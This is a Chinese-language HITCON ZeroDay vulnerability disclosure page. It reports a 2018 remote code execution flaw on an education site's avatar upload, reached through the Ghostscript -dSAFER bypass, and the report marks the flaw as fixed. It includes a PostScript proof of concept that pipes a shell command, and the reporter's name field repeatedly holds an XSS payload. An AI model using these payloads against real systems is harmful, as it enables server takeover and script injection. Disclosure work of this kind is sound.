Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-01240
- Vendor: 你知我知股份有限公司
- Title: 你知我知好學網 可上傳 Ghostscript 圖片導致 Remote Code Execution
- Introduction: Remote Code Execution
處理狀態
目前狀態
公開
Last Update : 2018/10/16
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2018/08/29 01:27:43 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/29 01:35:54 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/29 22:53:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 01:31:08 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 01:31:08 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/04 01:31:08 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/10/07 19:52:36 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/10/08 15:33:59 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/10/16 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-01240
- 通報者:morrow (<svg/onload=alert(1)>)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://uknowiknow.com/member/settings
敘述
問題點發生在 https://uknowiknow.com/member/settings 上傳大頭照的地方
透過上傳一個 postscript 格式的圖片,就能直接拿到網站的 shell
POC
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%sleep 5) currentdevice putdeviceprops
主要可以執行的原因是因為 postscript 存在 -dSafer bypass 的漏洞,可以直接利用
這個問題可以參考 http://openwall.com/lists/oss-security/2018/08/21/2
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。